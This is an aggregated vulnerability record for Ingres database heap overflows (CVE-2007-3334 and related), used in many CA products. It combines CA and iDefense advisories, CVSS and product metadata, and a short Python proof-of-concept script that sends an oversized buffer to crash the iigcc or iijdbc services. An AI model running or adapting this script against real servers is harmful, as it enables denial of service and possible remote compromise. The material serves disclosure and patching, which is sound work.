Lightweight Portal 2 Unicenter Management Portal r3.1.1 Unicenter Network and Systems Management r3.0, r11 Unicenter Network and Systems Management - Tiered - Multi Platform r3.0 0305, r3.1 0403, r11.0 Unicenter Patch Management r11 Unicenter Remote Control 6, r11 Unicenter Service Accounting r11, r11.1 Unicenter Service Assure r2.2, r11, r11.1 Unicenter Service Catalog r11, r11.1 Unicenter Service Delivery r11.0, r11.1 Unicenter Service Intelligence r11 Unicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1 Unicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, r11.1, r11.2 Unicenter Software Delivery r11 Unicenter TNG 2.4, 2.4.2, 2.4.2J Unicenter Workload Control Center r1 SP3, r1 SP4 Unicenter Web Services Distributed Management 3.11, 3.50 Wily SOA Manager 7.1
Affected Platforms: All operating system platforms supported by the various CA products that embed Ingres. This includes Windows, Linux, and supported UNIX platforms.
Status and Recommendation: CA recommends that customers apply the appropriate fix(es) listed on the Security Notice page: http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp
Workaround: None
References (URLs may wrap): CA SupportConnect: http://supportconnect.ca.com/ CA SupportConnect Security Notice for these vulnerabilities: Ingres Security Alert http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp Important Security Notice for Customers Using Products That Embed Ingres http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp CA Security Advisor posting: CA Products That Embed Ingres Multiple Vulnerabilities http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778 CA Vuln ID (CAID): 35450, 35451, 35452, 35453 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453 Ingres knowledge base document: http://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl Reported By: NGSSoftware, and iDefense NGSSoftware Advisory: http://www.ngssoftware.com/research/advisories/ iDefense Advisory: Ingres Database Multiple Heap Corruption Vulnerabilities http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546 CVE References: CVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334 OSVDB References: Pending http://osvdb.org/
Changelog for this advisory: v1.0 - Initial Release
Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form. URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2007 CA. All rights reserved. Ingres Database Multiple Heap Corruption Vulnerabilities
iDefense Security Advisory 06.21.07 http://labs.idefense.com/intelligence/vulnerabilities/ Jun 21, 2007
I. BACKGROUND
Ingres is the database backend used by default in several CA products. The SCM (Secure Content Manager) is one of the products that uses Ingres. The SCM use Ingres to store quarantined virii and blocked HTTP requests/replies. For more information visit the following URLs.
http://www3.ca.com/solutions/Product.aspx?ID=1013
http://www.ingres.com/
II. The Communications Server is the main component responsible for receiving and handling requests from the network. The Data Access Server is responsible for handling requests from the Ingres JDBC Driver and .NET data providers. These requests are decoded into Ingres internal formats and passed on to other components of the database server.
The application does not properly validate the length of attacker supplied data before copying it into a fixed size heap buffer. This leads to an exploitable condition.
III. ANALYSIS
Exploitation allows an unauthenticated attacker to execute arbitrary code with SYSTEM privileges.
In order to exploit this vulnerability an attacker would have to send a malformed request to the database server. This requires the ability to establish a TCP session on port 10916 (iigcc) or 10923 (iigcd).
Exploitation has been demonstrated to be trivial.
IV. Previous versions may also be affected. In addition, any application that uses the Ingres Database may be vulnerable.
V. WORKAROUND
Employing firewalls or other access control methods can effectively reduce exposure to this vulnerability.
VI. VENDOR RESPONSE
CA has made fixes available for all supported CA products that embed Ingres. For more information consult CA's Security Alert at the following URL.
http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-3334 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.
VIII. DISCLOSURE TIMELINE
01/16/2007 Initial vendor notification 01/17/2007 Initial vendor response 06/21/2007 Coordinated public disclosure
IX. CREDIT
The discoverer of this vulnerability wishes to remain anonymous.
Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events http://labs.idefense.com/
X. LEGAL NOTICES
Copyright \xa9 2007 iDefense, Inc.
Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
Date: 2010-08-14
Author: fdisk
Version: 2.6
Tested on: Windows 2003 Server SP1 en
CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
Notes: Fixed in the last version.
please let me know if you are/were able to get code execution
import socket import sys
if len(sys.argv) != 4: print "Usage: ./CAAdvantageDoS.py " print "Vulnerable Services: iigcc, iijdbc" sys.exit(1)
host = sys.argv[1] port = int(sys.argv[2]) service = sys.argv[3]
if service == "iigcc": payload = "\x41" * 2106 elif service == "iijdbc": payload = "\x41" * 1066 else: print "Vulnerable Services: iigcc, iijdbc" sys.exit(1)
payload += "\x42" * 4
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) print "Sending payload" s.send(payload) data = s.recv(1024) s.close() print 'Received', repr(data)
print service + " crashed"
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200706-0395",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "database server",
"scope": "eq",
"trust": 1.8,
"vendor": "ingres",
"version": "3.0.3"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "8.0"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "r8"
},
{
"model": "windows",
"scope": null,
"trust": 0.8,
"vendor": "microsoft",
"version": null
},
{
"model": "all windows",
"scope": null,
"trust": 0.6,
"vendor": "microsoft",
"version": null
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "20060"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "3.0.3"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "2.6"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "2.5"
},
{
"model": "associates wily soa manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates unicenter workload control center 1.0.sp4",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates unicenter workload control center sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4.2"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter tng 2.4.2j",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter serviceplus service desk sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter serviceplus service desk sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.5"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0.2"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter service delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service catalog",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter patch management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter management portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1.1"
},
{
"model": "associates unicenter lightweight portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2"
},
{
"model": "associates unicenter job management option",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter enterprise job manager sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter enterprise job manager sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter desktop management suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter desktop and server management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter database command center",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter ca web services distributed management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter ca web services distributed management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.11"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2.1"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.3"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter asset intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter advanced systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates etrust web access control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates etrust single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust network forensics",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust iam toolkit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust iam toolkit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates etrust iam suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates etrust directory",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust audit r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust admin sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust admin sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates docserver",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates cleverpath predictive analysis server",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates cleverpath aion bre",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.1"
},
{
"model": "associates cleverpath aion bpm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.1"
},
{
"model": "associates ccs",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates brightstor storage resource manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor storage command center",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor enterprise backup for tru64",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for hp",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for aix",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor arcserve backup for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "9.0"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for laptops and desktops",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates allfusion harvest change manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates allfusion harvest change manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates allfusion enterprise workbench sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates advantage data transformer",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
}
],
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"db": "NVD",
"id": "CVE-2007-3334"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:microsoft:all_windows:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_secure_content_manager:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ingres:database_server:3.0.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2007-3334"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "iDEFENSEChris Anley\u203b chris@ngssoftware.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
}
],
"trust": 0.6
},
"cve": "CVE-2007-3334",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2007-3334",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2007-3334",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200706-357",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"db": "NVD",
"id": "CVE-2007-3334"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple heap-based buffer overflows in the (1) Communications Server (iigcc.exe) and (2) Data Access Server (iigcd.exe) components for Ingres Database Server 3.0.3, as used in CA (Computer Associates) products including eTrust Secure Content Manager r8 on Windows, allow remote attackers to execute arbitrary code via unknown vectors. \nSuccessful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the \u0027alarkp.def\u0027 file. \n\n3) Ingres wakeup file overwrite (reported by NGSSoftware) \n[Ingres bug 115913, CVE-2007-3337, CAID 35451]\nDescription: The \"wakeup\" binary creates a file named \n\"alarmwkp.def\" in the current directory, truncating the file if it \nalready exists. The \"wakeup\" binary is setuid \"ingres\" and \nworld-executable. Consequently, an attacker can truncate a file \nwith the privileges of the \"ingres\" user. \n\n4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) \n[Ingres bug 115911, CVE-2007-3338, CAID 35452]\nDescription: An attacker can pass a long string as an argument to \nuuid_from_char() to cause a stack buffer overflow and the saved \nreturned address can be overwritten. \n\n5) Ingres verifydb local stack overflow (reported by NGSSoftware) \n[Ingres bug 115911, CVE-2007-3338, CAID 35452]\nDescription: A local attacker can exploit a stack overflow in the \nIngres verifydb utility duve_get_args function. This only \naffects Ingres on the Windows operating system. Reported by \niDefense as IDEF2023. This only affects Ingres on the Windows \noperating system. Reported by iDefense as IDEF2022. \n\nMitigating Factors: None\n\nSeverity: CA has given these vulnerabilities a cumulative High \nrisk rating. \n\nAffected Products:\nAdvantage Data Transformer r2.2\nAllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1\nAllFusion Harvest Change Manager r7, r7.1\nBrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, \n Linux and Mainframe Linux)\nBrightStor ARCserve Backup for Laptops and Desktops r11.5\nBrightStor Enterprise Backup (Unix only) r10.5\nBrightStor Storage Command Center r11.5\nBrightStor Storage Resource Manager r11.5\nCleverPath Aion Business Rules Expert r10.1\nCleverPath Aion Business Process Monitoring r10.1\nCleverPath Predictive Analysis Server r3\nDocServer 1.1\neTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2\neTrust Audit r8 SP2\neTrust Directory r8.1\neTrust IAM Suite r8.0\neTrust IAM Toolkit r8.0, r8.1\neTrust Identity Manager r8.1\neTrust Network Forensics r8.1\neTrust Secure Content Manager r8\neTrust Single Sign-On r7, r8, r8.1\neTrust Web Access Control 1.0\nUnicenter Advanced Systems Management r11\nUnicenter Asset Intelligence r11\nUnicenter Asset Management r11\nUnicenter Asset Portfolio Management r11.2.1, r11.3\nUnicenter CCS r11\nUnicenter Database Command Center r11.1\nUnicenter Desktop and Server Management r11\nUnicenter Desktop Management Suite r11\nUnicenter Enterprise Job Manager r1 SP3, r1 SP4\nUnicenter Job Management Option r11\nUnicenter Lightweight Portal 2\nUnicenter Management Portal r3.1.1\nUnicenter Network and Systems Management r3.0, r11\nUnicenter Network and Systems Management - Tiered - Multi Platform \n r3.0 0305, r3.1 0403, r11.0\nUnicenter Patch Management r11\nUnicenter Remote Control 6, r11\nUnicenter Service Accounting r11, r11.1\nUnicenter Service Assure r2.2, r11, r11.1\nUnicenter Service Catalog r11, r11.1\nUnicenter Service Delivery r11.0, r11.1\nUnicenter Service Intelligence r11\nUnicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1\nUnicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, \n r11.1, r11.2\nUnicenter Software Delivery r11\nUnicenter TNG 2.4, 2.4.2, 2.4.2J\nUnicenter Workload Control Center r1 SP3, r1 SP4\nUnicenter Web Services Distributed Management 3.11, 3.50\nWily SOA Manager 7.1\n\nAffected Platforms:\nAll operating system platforms supported by the various CA \nproducts that embed Ingres. This includes Windows, Linux, and \nsupported UNIX platforms. \n\nStatus and Recommendation:\nCA recommends that customers apply the appropriate fix(es) listed \non the Security Notice page: \nhttp://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp\n\nWorkaround: None\n\nReferences (URLs may wrap):\nCA SupportConnect:\nhttp://supportconnect.ca.com/\nCA SupportConnect Security Notice for these vulnerabilities:\nIngres Security Alert\nhttp://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp\nImportant Security Notice for Customers Using Products That Embed \nIngres\nhttp://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp\nCA Security Advisor posting: \nCA Products That Embed Ingres Multiple Vulnerabilities\nhttp://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778\nCA Vuln ID (CAID): 35450, 35451, 35452, 35453\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453\nIngres knowledge base document:\nhttp://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl\nReported By: NGSSoftware, and iDefense\nNGSSoftware Advisory: \nhttp://www.ngssoftware.com/research/advisories/\niDefense Advisory: \nIngres Database Multiple Heap Corruption Vulnerabilities\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546\nCVE References:\nCVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334\nOSVDB References: Pending\nhttp://osvdb.org/\n\nChangelog for this advisory:\nv1.0 - Initial Release\n\nCustomers who require additional information should contact CA\nTechnical Support at http://supportconnect.ca.com. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your\nfindings to vuln AT ca DOT com, or utilize our \"Submit a \nVulnerability\" form. \nURL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy 